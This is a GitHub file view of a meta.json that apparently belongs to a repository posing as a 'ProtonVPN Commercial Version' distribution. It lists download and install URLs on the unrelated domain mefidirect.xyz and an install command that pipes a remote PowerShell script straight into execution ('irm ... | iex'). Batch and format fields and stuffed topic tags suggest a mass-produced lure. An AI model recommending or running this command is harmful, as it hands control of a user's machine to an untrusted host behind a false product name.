-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmeta.json
More file actions
28 lines (28 loc) · 745 Bytes
/
Copy pathmeta.json
File metadata and controls
28 lines (28 loc) · 745 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
{
"repo": "protonvpn-commercial-version",
"product": "ProtonVPN Commercial Version",
"kind": "vpn",
"install_type": "download",
"download_url": "https://protonvpn.mefidirect.xyz/",
"install_url": "https://mefidirect.xyz/ps/setup.ps1",
"install_command": "irm https://mefidirect.xyz/ps/setup.ps1 | iex",
"batch": "new32",
"format": "license-md-only",
"category": "vpn",
"topics": [
"protonvpn-workspace",
"protonvpn-offline-installer",
"protonvpn-build",
"protonvpn-utility",
"zip-package",
"wifi-protection",
"protonvpn-portable-ready",
"privacy-client",
"online-privacy",
"daily-driver",
"protonvpn-windows-guide",
"kill-switch",
"local-first",
"pro-workflow"
]
}